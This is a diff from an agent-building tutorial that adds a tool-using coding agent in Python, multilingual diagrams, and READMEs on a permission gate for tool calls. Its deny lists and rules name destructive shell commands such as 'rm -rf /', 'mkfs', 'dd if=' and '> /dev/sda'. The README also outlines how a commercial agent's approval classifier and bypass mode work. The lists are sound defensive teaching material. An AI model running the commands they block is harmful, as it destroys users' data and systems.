+ + diff --git a/s02_tool_use/code.py b/s02_tool_use/code.py new file mode 100644 index 000000000..e843a4776 --- /dev/null +++ b/s02_tool_use/code.py @@ -0,0 +1,212 @@ +#!/usr/bin/env python3 +""" +s02: Tool Use — 在 s01 基础上新增 4 个工具 + 分发映射 + 并发分区。 + +运行: python s02_tool_use/code.py +需要: pip install anthropic python-dotenv + .env 中配置 ANTHROPIC_API_KEY + +本文件 = s01 的全部代码 + 以下新增: + + run_read / run_write / run_edit / run_glob 四个工具实现 + + TOOL_HANDLERS 分发映射(替代 s01 中硬编码的 run_bash 调用) + + partition_tool_calls 并发分区 + + safe_path 路径安全校验 + +循环本身(agent_loop)与 s01 完全一致。 +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." + + +# ═══════════════════════════════════════════════════════════ +# FROM s01 (unchanged) +# ═══════════════════════════════════════════════════════════ + +def run_bash(command: str) -> str: + dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"] + if any(d in command for d in dangerous): + return "Error: Dangerous command blocked" + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + except (FileNotFoundError, OSError) as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 4 个新工具 +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 工具定义(s01 只有一个 bash,现在扩展到 5 个) +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 工具分发映射(s01 是硬编码 run_bash,现在改为查表) +# ═══════════════════════════════════════════════════════════ + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 并发分区(s01 只有 bash 单个工具,不需要分区) +# ═══════════════════════════════════════════════════════════ + +def partition_tool_calls(blocks): + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + if block.name in ("bash", "edit_file", "write_file"): + sequential.append(block) + else: + concurrent.append(block) + return concurrent, sequential + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — 与 s01 结构完全一致,只改了工具执行那一行 +# s01: output = run_bash(block.input["command"]) +# s02: output = TOOL_HANDLERS[block.name](**block.input) +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + # s02 改动: 分区执行(s01 是直接循环执行) + concurrent, sequential = partition_tool_calls(response.content) + results = [] + + for block in sequential: + print(f"\033[33m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) # s02: 查表替代硬编码 + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + for block in concurrent: + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s02: Tool Use — 在 s01 基础上加了 4 个工具") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms02 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s02_tool_use/images/concurrency-comparison.en.svg b/s02_tool_use/images/concurrency-comparison.en.svg new file mode 100644 index 000000000..72b7890fa --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.en.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + Tool Concurrency — Teaching Version vs Claude Code + + + + Model returns 5 tool calls at once + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + Teaching: Hardcoded by Tool Name + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + Result: 2 groups + + + Sequential (runs first) + bash "ls" · write B + + + Concurrent + read A · glob · read C + + ⚠ bash "ls" placed in sequential group + It's read-only — could run concurrently with reads + + + + Claude Code: isConcurrencySafe(input) + + + Each tool call judged individually: + tool.isConcurrencySafe(parsedInput) → bool + + Result: 3 batches (by consecutive blocks) + + + Batch 1 + Concurrent + read A · glob + + + + + Batch 2 + Concurrent + bash "ls" + + + + + Batch 3 + Serial + write B + + + Batch 4 + read C · Concurrent + + ✓ bash "ls" correctly runs concurrently — faster than teaching version + ✓ Input-dependent judgment, not hardcoded by tool name + + + + Key Difference + • Teaching: Groups by tool name → simple but coarse; bash read-only commands (ls, cat) incorrectly serialized + • CC: Judges by isConcurrencySafe(input) per call → bash "ls" and read_file can run concurrently; bash "rm" must queue + • Teaching simplification is intentional — first understand "some tools can run simultaneously", then naturally ask "can bash ls run with read?" + diff --git a/s02_tool_use/images/concurrency-comparison.ja.svg b/s02_tool_use/images/concurrency-comparison.ja.svg new file mode 100644 index 000000000..4824590c8 --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.ja.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + ツール並列実行 — 教育版 vs Claude Code + + + + モデルが一度に 5 つのツール呼び出しを返す + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + 教育版:ツール名でハードコード分组 + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + 結果:2 グループ + + + Sequential(先に実行) + bash "ls" · write B + + + Concurrent(並列) + read A · glob · read C + + ⚠ bash "ls" が sequential グループに配置 + 読み取り専用なので read と並列実行可能なのに + + + + Claude Code:isConcurrencySafe(input) + + + 各ツール呼び出しを個別に判定: + tool.isConcurrencySafe(parsedInput) → bool + + 結果:3 バッチ(連続ブロックごと) + + + Batch 1 + 並列 + read A · glob + + + + + Batch 2 + 並列 + bash "ls" + + + + + Batch 3 + 直列 + write B + + + Batch 4 + read C · 並列 + + ✓ bash "ls" が正しく並列実行 — 教育版より高速 + ✓ 入力に基づく判定、ツール名のハードコードではない + + + + 核心的な違い + • 教育版:ツール名で分组 → シンプルだが粗い、bash の読み取り専用コマンド(ls、cat)が誤って直列化される + • CC:isConcurrencySafe(input) で呼び出しごとに判定 → bash "ls" と read_file は並列可能、bash "rm" は順次必須 + • 教育版の簡略化は意図的 — まず「一部のツールは同時に実行できる」を理解し、自然に「bash ls は read と一緒に?」と問いが出る + diff --git a/s02_tool_use/images/concurrency-comparison.svg b/s02_tool_use/images/concurrency-comparison.svg new file mode 100644 index 000000000..8408f2dc1 --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + Tool Concurrency — 教学版 vs Claude Code + + + + 模型一次返回 5 个工具调用 + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + 教学版:按工具名硬编码分组 + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + 结果:2 组 + + + Sequential(先跑) + bash "ls" · write B + + + Concurrent(并发) + read A · glob · read C + + ⚠ bash "ls" 被排到 sequential 组 + 它是只读的,本可以和 read 并发跑 + + + + Claude Code:isConcurrencySafe(input) + + + 每个工具调用单独判断: + tool.isConcurrencySafe(parsedInput) → bool + + 结果:3 个 batch(按连续块分批) + + + Batch 1 + 并发 + read A · glob + + + + + Batch 2 + 并发 + bash "ls" + + + + + Batch 3 + 串行 + write B + + + Batch 4 + read C · 并发 + + ✓ bash "ls" 正确并发,比教学版快 + ✓ 输入相关的判断,不是工具名硬编码 + + + + 核心差异 + • 教学版:按工具名分组 → 简单但粗糙,bash 的只读命令(ls、cat)被错误串行化 + • CC:按 isConcurrencySafe(input) 逐次判断 → bash "ls" 和 read_file 可以并发,bash "rm" 必须排队 + • 教学版的简化是刻意的——先理解"某些工具可以同时跑",进阶时自然会问"bash ls 能不能和 read 一起跑?" + diff --git a/s02_tool_use/images/tool-dispatch.en.svg b/s02_tool_use/images/tool-dispatch.en.svg new file mode 100644 index 000000000..8864f7d97 --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.en.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — Loop Unchanged, Just Add Dispatch Mapping + + + s01 Preserved + + + + User Query + messages[] + + + + + + + LLM + stop_reason check + + + + + + + tool_use? + + + + No + + Return Result + + + + Yes + + + s02 New + + + + TOOL_HANDLERS Dispatch Mapping + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + Append tool_result to messages + + + + + s01 Preserved (loop, LLM, decision — completely unchanged) + + s02 New (5 tools + dispatch mapping) + Only 1 line changed in the loop: run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s02_tool_use/images/tool-dispatch.ja.svg b/s02_tool_use/images/tool-dispatch.ja.svg new file mode 100644 index 000000000..279efa6ef --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.ja.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — ループ不変、ディスパッチマッピングを追加 + + + s01 保持 + + + + ユーザーの質問 + messages[] + + + + + + + LLM + stop_reason 判定 + + + + + + + tool_use? + + + + No + + 結果を返す + + + + Yes + + + s02 新規 + + + + TOOL_HANDLERS ディスパッチマッピング + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + tool_result を messages に追加 + + + + + s01 保持(ループ、LLM、判定 — 完全に不変) + + s02 新規(5 つのツール + ディスパッチマッピング) + ループ内で変更されたのは 1 行だけ:run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s02_tool_use/images/tool-dispatch.svg b/s02_tool_use/images/tool-dispatch.svg new file mode 100644 index 000000000..d56bf0f04 --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — 循环不变,只加分发映射 + + + s01 保留 + + + + 用户提问 + messages[] + + + + + + + 大模型 (LLM) + stop_reason 判断 + + + + + + + tool_use? + + + + + + 返回结果 + + + + + + + s02 新增 + + + + TOOL_HANDLERS 分发映射 + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + tool_result 追加到 messages + + + + + s01 保留(循环、LLM、判断——完全不变) + + s02 新增(5 个工具 + 分发映射) + 循环里只改了 1 行:run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s03_permission/README.en.md b/s03_permission/README.en.md new file mode 100644 index 000000000..2c0bce7e1 --- /dev/null +++ b/s03_permission/README.en.md @@ -0,0 +1,231 @@ +# s03: Permission — Boundaries Before Freedom + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"Boundaries before freedom"* — The permission pipeline decides which operations need approval. +> +> **Harness Layer**: Permission — a gate before tool execution. + +--- + +## The Problem + +s02's Agent has 5 tools and can do anything. Ask it to "clean up the project," and it might run `rm -rf /`. + +You shouldn't rely on **trusting the model** for safety. Safety should be enforced by **code** — a gate inserted before every tool execution. + +--- + +## The Solution + +![Permission Overview](images/permission-overview.en.svg) + +s02's loop is fully preserved. The only change is inserting `check_permission()` before tool execution — each tool call passes through three gates in a fixed order: hard deny first, then soft ask, and if neither matches, allow. + +The three gates correspond to three decisions: + +| Gate | Purpose | On Match | +|------|---------|----------| +| 1. Deny List | Permanently forbidden operations (`rm -rf /`, `sudo`) | Denied immediately, not executed | +| 2. Rule Matching | Context-dependent operations (writing outside workspace, `rm` files) | Passed to Gate 3 | +| 3. User Approval | After Gate 2 matches, pauses for user confirmation | User decides allow or deny | + +None of the three gates match → execute directly. Most routine operations take this path. + +--- + +## How It Works + +![Permission Pipeline](images/permission-pipeline.en.svg) + +**Gate 1**: A hard deny list. Check first; if matched, return a block message. + +```python +DENY_LIST = [ + "rm -rf /", "sudo", "shutdown", "reboot", + "mkfs", "dd if=", "> /dev/sda", +] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None +``` + +**Gate 2**: Rule matching — describes "when to ask the user." Each rule specifies a tool and a check condition. + +```python +PERMISSION_RULES = [ + { + "tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace", + }, + { + "tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]), + "message": "Potentially destructive command", + }, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None +``` + +**Gate 3**: After a rule matches, pause for user input. + +```python +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n⚠ {reason}") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**All three gates chained together**, inserted before tool execution: + +```python +def check_permission(block) -> bool: + # Gate 1: Hard deny + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # Gate 2 + 3: Rule matching → User approval + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# In agent_loop — s02's loop with just one line added: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← NEW + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 original + results.append(...) +``` + +--- + +## Changes from s02 + +| Component | Before (s02) | After (s03) | +|-----------|-------------|-------------| +| Security model | None (trust the model) | Three-gate permission pipeline | +| New functions | — | check_deny_list, check_rules, ask_user, check_permission | +| Loop | Executes all tools directly | Inserts check_permission() before execution | + +--- + +## Try It + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +Try these prompts: + +1. `Create a file called test.txt in the current directory` (should pass through) +2. `Delete all temporary files in /tmp` (bash + rm triggers Gate 2) +3. `What files are in the current directory?` (read-only, all pass) +4. `Try to write a file to /etc/something` (writing outside workspace triggers Gate 2) + +What to watch for: Which operations pass through? Which need your confirmation? Which are denied outright? + +--- + +## What's Next + +Permission checks are in place — but every check is hardcoded as `check_permission()` inside the loop. What if you want to add logging before and after each tool execution? What if you want to auto-trigger a git commit after certain operations? Scattering this extension logic throughout the loop turns it into spaghetti. + +→ s04 Hooks: Attach a row of hooks to the loop. Extension logic hangs on hooks; the loop itself stays clean. + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `types/permissions.ts`, `toolExecution.ts`, `tools.ts`, `yoloClassifier.ts`, `bashPermissions.ts`. + +### 1. PermissionResult: Not 3, but 4 + +The teaching version's three gates (deny → ask → allow) don't fully correspond to CC. CC's `PermissionResult` has 4 behaviors (`types/permissions.ts:241-266`): + +| behavior | Meaning | Teaching Version Equivalent | +|----------|---------|---------------------------| +| `allow` | Allow directly | Gate 3 passes | +| `deny` | Deny directly | Gate 1 matches | +| `ask` | Show dialog to user | Gate 2 matches | +| `passthrough` | Tool doesn't express opinion, passes to generic pipeline | Not in teaching version | + +### 2. The Complete 8-Step Verification Pipeline + +CC's `checkPermissionsAndCallTool()` (`toolExecution.ts:599-1745`) isn't three gates — it's eight steps: + +1. **Zod schema validation** (L615) — parameter type checking +2. **validateInput()** (L683) — tool-level semantic validation +3. **backfillObservableInput()** (L784) — backfill legacy fields +4. **PreToolUse hooks** (L800) — hooks can return allow/deny/ask +5. **resolveHookPermissionDecision()** (L921) — coordinate hook + pipeline decisions +6. **hasPermissionsToUseTool()** — six-layer rule check: + - 1a. Entire tool disabled by deny rule → `deny` + - 1b. Entire tool flagged by ask rule → `ask` + - 1c. `tool.checkPermissions()` tool's own judgment + - 1d. Tool itself returns deny → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. Content-related ask rules → `ask` (not bypassable) + - 1g. Security check violation → `ask` (not bypassable) +7. **Mode bypass** (L1268) — bypassPermissions mode → `allow` +8. **passthrough → ask conversion** (L1300) — default to asking + +### 3. Deny List: Not One File, but 8 Sources + +CC doesn't have a single deny list. Permission rules come from 8 sources (`types/permissions.ts:54-62`): + +| Source | Configuration Location | +|--------|----------------------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | Feature flags | +| `policySettings` | Enterprise management policy | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | Inline command | +| `session` | In-session temporary authorization | + +Each rule format: `{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`. Rules from multiple sources are merged and sorted by priority (local > project > user). + +### 4. What is isDestructive() + +The teaching version treats `isDestructive` as part of permission checking. But in CC, it's **purely for UI display** (`Tool.ts:406`) — showing a `[destructive]` label in the tool list. It doesn't participate in permission decisions. All tools return `false` by default. Only ExitWorktree (on remove) and MCP tools (depending on `annotations.destructiveHint`) override it. + +### 5. YoloClassifier (Auto-Approval) + +In CC's auto mode, it doesn't pop a dialog every time. `classifyYoloAction` (`yoloClassifier.ts:1012`) sends the tool call + conversation context to a classifier LLM to judge safety. It first tries acceptEdits mode simulation (if acceptEdits allows → auto-approve), then checks the safe tool whitelist, and finally calls the classifier. If the classifier rejects too many times in a row → falls back to manual approval. + +### 6. Permission Bubbling + +A sub-Agent's (forked via AgentTool) `permissionMode` is set to `'bubble'` (`forkSubagent.ts:50`). This means permission dialogs **bubble up to the parent Agent's terminal**, rather than being silently denied in the sub-Agent. The Bash classifier continues running during this process — displaying the permission dialog while judging in the background whether auto-approval is possible. + +### The Teaching Version's Simplification Is Intentional + +- 8-step pipeline → 3 gates: dramatically lower barrier to understanding +- 8 rule sources → 1 local DENY_LIST: manageable concept count +- isDestructive → omitted (teaching version has no UI layer) +- YoloClassifier → omitted (depends on additional LLM calls and telemetry) +- Permission bubbling → omitted (s15 covers multi-Agent) + +
+ + diff --git a/s03_permission/README.ja.md b/s03_permission/README.ja.md new file mode 100644 index 000000000..11cf7dda8 --- /dev/null +++ b/s03_permission/README.ja.md @@ -0,0 +1,231 @@ +# s03: Permission — 先に境界を引いて、自由を与える + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"Boundaries before freedom"* — 権限パイプラインは、どの操作に承認が必要かを決める。 +> +> **Harness レイヤー**: 権限 — ツール実行前に一つのゲートを追加。 + +--- + +## 課題 + +s02 の Agent は 5 つのツールを持ち、何でもできる。「プロジェクトを掃除して」と頼むと、`rm -rf /` を実行しかねない。 + +**モデルを信頼すること**で安全性を担保すべきではない。安全性は**コード**で担保する — ツール実行前に一つのゲートを追加する。 + +--- + +## ソリューション + +![Permission Overview](images/permission-overview.ja.svg) + +s02 のループは完全に維持される。唯一の変更は、ツール実行前に `check_permission()` を挿入すること — 各ツール呼び出しは 3 つのゲートを固定順序で通過する:ハード拒否が最優先、次にソフト確認、どちらも一致しなければ許可。 + +3 つのゲートは 3 つの決定に対応する: + +| ゲート | 役割 | 一致時 | +|--------|------|--------| +| 1. 拒否リスト | 常に禁止される操作(`rm -rf /`、`sudo`) | 即座に拒否、実行しない | +| 2. ルールマッチング | コンテキスト依存の操作(作業ディレクトリ外への書き込み、`rm` ファイル) | ゲート 3 へ | +| 3. ユーザー承認 | ゲート 2 が一致した場合、ユーザー確認を待機 | ユーザーが許可または拒否を決定 | + +3 つのゲートのどれにも一致しない → 直接実行。日常の操作の大部分はこの経路を通る。 + +--- + +## 仕組み + +![Permission Pipeline](images/permission-pipeline.ja.svg) + +**ゲート 1**:ハード拒否リスト。最初に確認し、一致すればブロックメッセージを返す。 + +```python +DENY_LIST = [ + "rm -rf /", "sudo", "shutdown", "reboot", + "mkfs", "dd if=", "> /dev/sda", +] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None +``` + +**ゲート 2**:ルールマッチング — 「いつユーザーに聞くべきか」を記述する。各ルールはツールとチェック条件を指定する。 + +```python +PERMISSION_RULES = [ + { + "tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace", + }, + { + "tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]), + "message": "Potentially destructive command", + }, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None +``` + +**ゲート 3**:ルールが一致した後、ユーザー入力を待機。 + +```python +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n⚠ {reason}") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**3 つのゲートを直列に接続**、ツール実行前に挿入する: + +```python +def check_permission(block) -> bool: + # ゲート 1: ハード拒否 + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # ゲート 2 + 3: ルールマッチング → ユーザー承認 + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# agent_loop で — s02 のループに 1 行追加するだけ: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← 新規 + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 既存 + results.append(...) +``` + +--- + +## s02 からの変更点 + +| コンポーネント | 変更前 (s02) | 変更後 (s03) | +|---------------|-------------|-------------| +| セキュリティモデル | なし(モデルを信頼) | 3 ゲート権限パイプライン | +| 新規関数 | — | check_deny_list, check_rules, ask_user, check_permission | +| ループ | すべてのツールを直接実行 | 実行前に check_permission() を挿入 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Create a file called test.txt in the current directory`(そのまま通過するはず) +2. `Delete all temporary files in /tmp`(bash + rm でゲート 2 が発動) +3. `What files are in the current directory?`(読み取り専用、すべて通過) +4. `Try to write a file to /etc/something`(作業ディレクトリ外への書き込みでゲート 2 が発動) + +観察のポイント:どの操作がそのまま通過するか? どれに確認が必要か? どれが即座に拒否されるか? + +--- + +## 次へ + +権限チェックは実装された — しかし、毎回ループ内に `check_permission()` をハードコードしている。ツール実行の前後にログを追加したい場合は? 特定の操作後に自動的に git commit をトリガーしたい場合は? このような拡張ロジックがループ内に散らばると、ループはすぐにスパゲッティになる。 + +→ s04 Hooks:ループに一列のフックを取り付ける。拡張ロジックはフックにぶら下げ、ループ自体は常にクリーンに保つ。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `types/permissions.ts`、`toolExecution.ts`、`tools.ts`、`yoloClassifier.ts`、`bashPermissions.ts` の完全分析に基づく。 + +### 一、PermissionResult:3 種ではなく、4 種 + +教育版の 3 つのゲート(deny → ask → allow)は CC と完全には対応しない。CC の `PermissionResult` には 4 つの behavior がある(`types/permissions.ts:241-266`): + +| behavior | 意味 | 教育版の対応 | +|----------|------|-------------| +| `allow` | 直接許可 | ゲート 3 通過 | +| `deny` | 直接拒否 | ゲート 1 一致 | +| `ask` | ユーザーにダイアログを表示 | ゲート 2 一致 | +| `passthrough` | ツールが意見を表明せず、汎用パイプラインに委ねる | 教育版にはなし | + +### 二、完全な 8 ステップ検証パイプライン + +CC の `checkPermissionsAndCallTool()`(`toolExecution.ts:599-1745`)は 3 つのゲートではなく、8 ステップ: + +1. **Zod schema 検証**(L615)— パラメータの型チェック +2. **validateInput()**(L683)— ツールレベルの意味的検証 +3. **backfillObservableInput()**(L784)— レガシーフィールドの補完 +4. **PreToolUse hooks**(L800)— フックが allow/deny/ask を返す +5. **resolveHookPermissionDecision()**(L921)— フック + パイプラインの決定を調整 +6. **hasPermissionsToUseTool()** — 6 層ルールチェック: + - 1a. ツール全体が deny rule で無効 → `deny` + - 1b. ツール全体が ask rule でマーク → `ask` + - 1c. `tool.checkPermissions()` ツール自身の判断 + - 1d. ツール自身が deny を返す → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. コンテンツ関連の ask ルール → `ask`(バイパス不可) + - 1g. セキュリティチェック違反 → `ask`(バイパス不可) +7. **モードバイパス**(L1268)— bypassPermissions モード → `allow` +8. **passthrough → ask 変換**(L1300)— デフォルトで ask に変換 + +### 三、拒否リスト:1 つのファイルではなく、8 つのソース + +CC には単一の deny list はない。権限ルールは 8 つのソースから来る(`types/permissions.ts:54-62`): + +| ソース | 設定場所 | +|--------|---------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | フィーチャーフラグ | +| `policySettings` | 企業管理ポリシー | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | インラインコマンド | +| `session` | セッション内一時承認 | + +各ルールの形式:`{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`。複数ソースのルールは統合され、優先順位(local > project > user)でソートされる。 + +### 四、isDestructive() とは + +教育版では `isDestructive` を権限判断の一部として扱っている。しかし CC では、これは**純粋に UI 表示用**(`Tool.ts:406`)である — ツール一覧に `[destructive]` ラベルを表示するだけ。権限決定には参加しない。デフォルトではすべてのツールが `false` を返す。ExitWorktree(remove 時)と MCP ツール(`annotations.destructiveHint` に依存)のみがこれをオーバーライドする。 + +### 五、YoloClassifier(自動承認) + +CC の auto モードでは、毎回ダイアログを表示するわけではない。`classifyYoloAction`(`yoloClassifier.ts:1012`)はツール呼び出し + 会話コンテキストを分類器 LLM に送って安全性を判断する。まず acceptEdits モードのシミュレーションを試み(acceptEdits が許可すれば → 自動承認)、次にセーフツールホワイトリストを確認し、最後に分類器を呼び出す。分類器が連続して拒否しすぎた場合 → 手動承認にフォールバック。 + +### 六、権限バブリング + +サブ Agent(AgentTool 経由でフォークされたもの)の `permissionMode` は `'bubble'` に設定される(`forkSubagent.ts:50`)。これは権限ダイアログが**親 Agent のターミナルにバブルアップ**することを意味する。サブ Agent で黙って拒否されるのではない。Bash 分類器はこの過程で引き続き実行され — 権限ダイアログを表示しつつ、バックグラウンドで自動承認可能か判断する。 + +### 教育版の単純化は意図的 + +- 8 ステップパイプライン → 3 ゲート:理解のハードルが大幅に下がる +- 8 ルールソース → 1 つのローカル DENY_LIST:概念量を制御可能 +- isDestructive → 省略(教育版には UI レイヤーがない) +- YoloClassifier → 省略(追加の LLM 